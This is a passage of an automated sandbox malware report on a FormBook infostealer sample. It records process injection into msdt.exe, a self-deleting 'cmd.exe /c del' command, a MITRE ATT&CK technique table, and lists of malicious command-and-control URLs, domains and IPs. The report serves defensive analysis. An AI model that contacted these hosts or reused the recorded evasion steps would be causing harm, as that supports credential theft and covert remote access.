
Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: B60000

Jump to behavior

Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Process created: C:\Users\user\Desktop\SKM_C36821010708320.exe C:\Users\user\Desktop\SKM_C36821010708320.exe			Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SKM_C36821010708320.exe'			Jump to behavior

Source: explorer.exe, 00000003.00000002.566052571.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000003.00000000.237897500.0000000001980000.00000002.00000001.sdmp, msdt.exe, 00000006.00000002.568458380.0000000003790000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000003.00000000.237897500.0000000001980000.00000002.00000001.sdmp, msdt.exe, 00000006.00000002.568458380.0000000003790000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.237897500.0000000001980000.00000002.00000001.sdmp, msdt.exe, 00000006.00000002.568458380.0000000003790000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.237897500.0000000001980000.00000002.00000001.sdmp, msdt.exe, 00000006.00000002.568458380.0000000003790000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Queries volume information: C:\Users\user\Desktop\SKM_C36821010708320.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SKM_C36821010708320.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.SKM_C36821010708320.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.SKM_C36821010708320.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection612	Rootkit1	Credential API Hooking1	Security Software Discovery221	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Masquerading1	LSASS Memory	Virtualization/Sandbox Evasion3	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion3	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Disable or Modify Tools1	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection612	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information4	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing12	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SKM_C36821010708320.exe	28%	ReversingLabs	ByteCode-MSIL.Spyware.Noon
SKM_C36821010708320.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
2.2.SKM_C36821010708320.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.bhscsh.com/6bu2/?_FNlYB=C+zDmV11Q+D9r33XVeqR5IBXFKX0BTJmu/S+z/bMoWLqgljoX+qokl8zdBgJjJlA7MT1&qRu=rTvtaraPvhs45	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.o-tanemaki.com/6bu2/?_FNlYB=UiUikuUm5Gnwa/RC8HfxmFUojYQ87eGtpmlzeqcBYMLKQcnADeoLPEL+PxRUrH62O+cU&qRu=rTvtaraPvhs45	0%	Avira URL Cloud	safe
http://www.ehealthla.com/6bu2/?_FNlYB=94KbLiUgY8wWwYGUmiNR7bnZsaGPnSdzNXNbmna93NLOwX7qMp/QzDnFT9WUG3fulNFR&qRu=rTvtaraPvhs45	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.idahofallsobituaries.com/6bu2/?_FNlYB=kQfR6oHqf1829R+dk89CbQkI6JsDf2kbL2dewoZCGSm5OfzNJ+nKnG9aqB78Y+EDmzvg&qRu=rTvtaraPvhs45	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.sheilataman.com/6bu2/?_FNlYB=JImKQCKfXzlBTYBvNEy/gJkFfNV1GdJ9tkN4E9b1C6xzootmnG8qxQeaBWCQRAMh80Yn&qRu=rTvtaraPvhs45	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.bhscsh.com	69.30.217.211	true	true	unknown
www.ehealthla.com	52.128.23.153	true	true	unknown
www.o-tanemaki.com	118.27.99.91	true	true	unknown
idahofallsobituaries.com	34.102.136.180	true	true	unknown
sheilataman.com	103.29.215.252	true	true	unknown
www.idahofallsobituaries.com	unknown	unknown	true	unknown
www.sheilataman.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.bhscsh.com/6bu2/?_FNlYB=C+zDmV11Q+D9r33XVeqR5IBXFKX0BTJmu/S+z/bMoWLqgljoX+qokl8zdBgJjJlA7MT1&qRu=rTvtaraPvhs45	true	Avira URL Cloud: safe	unknown
http://www.o-tanemaki.com/6bu2/?_FNlYB=UiUikuUm5Gnwa/RC8HfxmFUojYQ87eGtpmlzeqcBYMLKQcnADeoLPEL+PxRUrH62O+cU&qRu=rTvtaraPvhs45	true	Avira URL Cloud: safe	unknown
http://www.ehealthla.com/6bu2/?_FNlYB=94KbLiUgY8wWwYGUmiNR7bnZsaGPnSdzNXNbmna93NLOwX7qMp/QzDnFT9WUG3fulNFR&qRu=rTvtaraPvhs45	true	Avira URL Cloud: safe	unknown
http://www.idahofallsobituaries.com/6bu2/?_FNlYB=kQfR6oHqf1829R+dk89CbQkI6JsDf2kbL2dewoZCGSm5OfzNJ+nKnG9aqB78Y+EDmzvg&qRu=rTvtaraPvhs45	true	Avira URL Cloud: safe	unknown
http://www.sheilataman.com/6bu2/?_FNlYB=JImKQCKfXzlBTYBvNEy/gJkFfNV1GdJ9tkN4E9b1C6xzootmnG8qxQeaBWCQRAMh80Yn&qRu=rTvtaraPvhs45	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fonts.com	explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
69.30.217.211	unknown	United States	32097	WIIUS	true
118.27.99.91	unknown	Japan	7506	INTERQGMOInternetIncJP	true
52.128.23.153	unknown	United States	19324	DOSARRESTUS	true
34.102.136.180	unknown	United States	15169	GOOGLEUS	true
103.29.215.252	unknown	Indonesia	58377	SENTRACOLO-AS-IDSentraNiagaSolusindoPTID	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	339379
Start date:	13.01.2021
Start time:	21:57:15
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SKM_C36821010708320.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/1@5/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 41.7% (good quality ratio 37.5%) Quality average: 74.3% Quality standard deviation: 31.5%
HCA Information:	Successful, ratio: 97% Number of executed functions: 74 Number of non-executed functions: 132
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 13.88.21.125, 104.43.193.48, 52.255.188.83, 23.210.248.85, 51.104.139.180, 92.122.213.247, 92.122.213.194, 8.248.135.254, 67.26.73.254, 67.27.158.254, 67.26.75.254, 67.27.233.254, 51.103.5.186, 20.54.26.129, 52.155.217.156 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net Report size getting too big, too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:58:15	API Interceptor	1x Sleep call for process: SKM_C36821010708320.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
118.27.99.91	DEBIT NOTE_INA101970.exe	Get hash	malicious	Browse	www.o-tanemaki.com/6bu2/?BZ=UiUikuUm5Gnwa/RC8HfxmFUojYQ87eGtpmlzeqcBYMLKQcnADeoLPEL+PxR+03K2K8UU&o8rLu=yVMpLRLxgxDtgBb
52.128.23.153	zz4osC4FRa.exe	Get hash	malicious	Browse	www.stafffully.com/oean/?1ba0AP=+9WAEfQCyp5HxQcyiadjC39SRpvqs9f27bBIUWE+OUMQn3TFA0re/tfQDqX9OJ3Ulha0&uHrt=FdiDzjvx
	btVnDhh5K7.exe	Get hash	malicious	Browse	www.stafffully.com/oean/?Tj=YvFHu&wxl=+9WAEfQCyp5HxQcyiadjC39SRpvqs9f27bBIUWE+OUMQn3TFA0re/tfQDqX9OJ3Ulha0
	4wCFJMHdEJ.exe	Get hash	malicious	Browse	www.stafffully.com/oean/?lTB=+9WAEfQCyp5HxQcyiadjC39SRpvqs9f27bBIUWE+OUMQn3TFA0re/tfQDp3tBons7Ezz&Bvg=yL0LRZtXKrL
	rtgs_pdf.exe	Get hash	malicious	Browse	www.globalefactory.com/s9zh/?mL08q=cfAP3dhEcu1Vi8J1aoBKUOXri8rpYHK2f4rCuERqPTnzLwFEaC7qLWEHuHs6kiCStM5V&9rn=DhodLVupGVRTP
	2021 Additional Agreement.exe	Get hash	malicious	Browse	www.wellnesssensation.com/bw82/?NjNl72=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z8vohabTLMb1R2mnPA==&Yn=fbdDwrOx0RedB
	wDMBDrN663.exe	Get hash	malicious	Browse	www.wellnesssensation.com/bw82/?QBZpld=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/Dr9qXrGtmj&LL3=aR-TJ4RpiN
	PO#14379 - SO#146001119375 XMAS wood land.exe	Get hash	malicious	Browse	www.walletworx.com/mld/?FDHTHvH=eXz609adlpJgM+GbjcD49qD6NuRM1Sqq0a1i11kc58HUWwC96w5klz7MgxI7dI4ORXBk&Rn=Vra0c
	KYC - 17DEC.xlsx	Get hash	malicious	Browse	www.wellnesssensation.com/bw82/?_nD83tU=455EGVYK5gwj6EGWPruX/4AMFbR5eugGoF6uNR+Emdxr+jw+VvqHfqz6wavXmKjYJszTIA==&bxop=FZm0mHgP8T4l1pi
	NEW ORDER 15DEC.xlsx	Get hash	malicious	Browse	www.wellnesssensation.com/bw82/?ong0rTC=455EGVYK5gwj6EGWPruX/4AMFbR5eugGoF6uNR+Emdxr+jw+VvqHfqz6wavXmKjYJszTIA==&PFQL=nHI4EV
	uM87pWnV44.exe	Get hash	malicious	Browse	www.wellnesssensation.com/bw82/?X0DxCzkX=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj&Ezr=TXFPhh7XVjsl
	Xqgvj3afT1.exe	Get hash	malicious	Browse	www.wellnesssensation.com/bw82/?rDKtm=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z8vR+r7QFaHyR2mgcw==&Wr=LhnHMLjP3
	DHL DOCS..exe	Get hash	malicious	Browse	www.indicatormarket.com/lsa/?D8e0g=FZRHs8YHZx&qR-tF=j6zcMESwh65v8ItLpDSh7iy3rRw9k52JvPvDuH2wN+kL1koWHBySfCEZXquezIXX7Pof
	at3nJkOFqF.exe	Get hash	malicious	Browse	www.wellnesssensation.com/bw82/?-Zlpi6B=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/Dr9qXrGtmj&2d=onxdA
	http://prayersontheweb.com	Get hash	malicious	Browse	prayersontheweb.com/favicon.ico
34.102.136.180	JdtN8nIcLi8RQOi.exe	Get hash	malicious	Browse	www.cmoorestudio.com/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=31XH+/ZkH6XWvzYOvP3dx+IltFKBIJcLA5RIt4d/klJVe3zOK/eQlkY/FHXkQqvnuoQd
	20210113432.exe	Get hash	malicious	Browse	www.exoticorganicwine.com/dkk/?EvI=Pne6zO+Z3a60Au06FHOmVrHS7z/OeLQppxmg+doCWmhHZjdmG5KKLECfP4ZcwEOpNG8I7WvO0Q==&J49Tz=eln47v8hVLB
	Inv.exe	Get hash	malicious	Browse	www.nationshiphop.com/hko6/?k2JxoV=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+1j5GiVi4vc4&OHiLR=jJBpdVbhUrMh9TJP
	74852.exe	Get hash	malicious	Browse	www.wingateofhouston.com/nf3n/?P6A=bFr0arjPDc1B3fljAhhQU4NpKn/qi+N2lxsYOk/PDiFBsnuAdXLBpwrG8B0Izk+nd97PpVoHHg==&-ZS=W6O4IjSXA
	orden pdf.exe	Get hash	malicious	Browse	www.unbelievabowboutique.com/n7ak/?rN=+VkjiNhUsWsopaF1OEtkI3uXqkAxa5zmKZmZM9Ocj2MgGwUlx9I3FiG4Gn++IiogSOWw&QZ3=dhrxPpcXO0TLHVR
	J0OmHIagw8.exe	Get hash	malicious	Browse	www.epicmassiveconcepts.com/csv8/?t8o8sPp=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&jBZd=KnhT
	zHgm9k7WYU.exe	Get hash	malicious	Browse	www.ricardoinman.com/xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=43tORsMo6Gry83Td78nIWgxEplzIHXHZqBl7iQpQA31ZPQcRtwVYWDcsKQZGhQx+cBJl
	JAAkR51fQY.exe	Get hash	malicious	Browse	www.epicmassiveconcepts.com/csv8/?EZUXxJ=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&DzrLH=VBZHYDrxndGXyf
	65BV6gbGFl.exe	Get hash	malicious	Browse	www.outlawgospelshow.com/kgw/?D81dO=3dsCTSsKJfcfLyYHdfjcimIAevlOxP45YAOPNmiGb3RckDOY5KdZ2EMbApwY76ndqYux&tTrL=Fpgl
	YvGnm93rap.exe	Get hash	malicious	Browse	www.crafteest.com/8rg4/?GXITC=UZP/0BHyEu1M6xcQwfN1oLvS1pOV65j2qrbsgROtnkuQKUAN6nqHjVn7Ph/tqme/ujGF&Jt7=XPy4nFjH
	Order_00009.xlsx	Get hash	malicious	Browse	www.brainandbodystrengthcoach.com/csv8/?1bwhC=4rzgp1jcc8l4Wxs4KztLQnvubqNqMY/2ozhXYXCY6yGJDbul1z8E6+SozVJniMc1Iz21RA==&tB=TtdpPpwhOlt
	13-01-21.xlsx	Get hash	malicious	Browse	www.kolamart.com/bw82/?x2J8=U5qlNe3qvCiRDMVNZAk3bGcrOcPwpu2hHSyAkQWR0ho6UxGTq/9WR3TB3nENm+o2HqQ7BQ==&Ab=gXuD_lh8bfV4RN
	NEW 01 13 2021.xlsx	Get hash	malicious	Browse	www.gdsjgf.com/bw82/?UL0xqd7P=7KG5rMnMQSi+1zMSyyvwq06b8xrmRTVdiDQe9ch18oMrwrVTJ7b27nrbU/HrWldfz0eoHA==&CXi4A=gXrXRfH0yDoHcf-
	PO85937758859777.xlsx	Get hash	malicious	Browse	www.bodyfuelrtd.com/8rg4/?RJ=A4ItsHP7WirPGvorxE1FqdRUH2iuHEJ7Bx0GuGGPjza4UX3M9OXu5uVQhTJ1ITDXtosJtw==&LFQHH=_pgx3Rd
	Order_385647584.xlsx	Get hash	malicious	Browse	www.oohdough.com/csv8/?NP=oR+kRp92OlWNPHb8tFeSfFFusuQV5SLrlvHcvTTApHN9lxDZF+KzMj/NshbaIk6/gJtwpQ==&nN6l9T=K0GdGdPX7JyL
	PO#218740.exe	Get hash	malicious	Browse	www.epochryphal.com/wpsb/?Wxo=n7b+ISrk/mPyWzbboTpvP41tNOKzDU5etPpa3uuDPgrT9THM2mbO6pyh4trMr+rUEpul&vB=lhv8
	20210111 Virginie.exe	Get hash	malicious	Browse	www.mrkabaadiwala.com/ehxh/?Gzux=8Ka3Lv4ePZYbHHrfWWyIjg6yKJpjzOn7QTDTNOD0A86ZD78kMrm+GgFnyvrieFQhDFXfm2RQfw==&AnB=O0DToLD8K
